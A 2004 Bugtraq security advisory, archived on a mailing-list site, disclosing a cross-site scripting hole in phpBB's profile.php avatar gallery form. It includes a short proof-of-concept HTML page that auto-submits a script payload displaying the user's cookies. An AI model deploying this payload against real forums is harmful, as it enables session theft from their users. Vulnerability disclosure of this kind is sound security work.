lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list] 
Date: 21 Mar 2004 03:36:19 -0000
From: Cheng Peng Su <apple_soup@....com>
To: bugtraq@...urityfocus.com
Subject: phpBB profile.php Cross Site Scripting Vulnerability





#####################################################################

 Advisory Name : phpBB profile.php Cross Site Scripting Vulnerability
  Release Date : Mar 21,2004 
   Application : phpBB
       Version : phpBB 2.0.6d or others?
      Platform : PHP
    Vendor URL : http://www.phpbb.com/
        Author : Cheng Peng Su(apple_soup_at_msn.com)
     
#####################################################################

 Proof of Conecpt:
  
     This vuln is in profile.php,when you click [Show Gallery],phpBB 
  will show you Avatar gallery,asking you to choose one for yourself.
  The hole is in the form,after submitting phpBB will use the value of 
  "avatarselect" as the path of the gallery directly,without filtering
  any illegal characters.
   
 Exploit:
  
  -------------exploit.htm--------------
  <form name='f' action="http://site/profile.php?mode=editprofile" method="post">
  <input name="avatarselect" value='" >&lt;script&gt;alert(document.cookie)&lt;/script&gt;'>
  <input type="submit" name="submitavatar" value="Select avatar">
  </form>
  &lt;script&gt;
  window.onload=function()
   {
    document.all.submitavatar.click();
   }
  &lt;/script&gt;
  ---------------end-------------------
  
 Contact:
 
  Cheng Peng Su
  Class 1,Senior 2,High school attached to Wuhan University
  Wuhan,Hubei,China(430072)
  apple_soup_at_msn.com

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ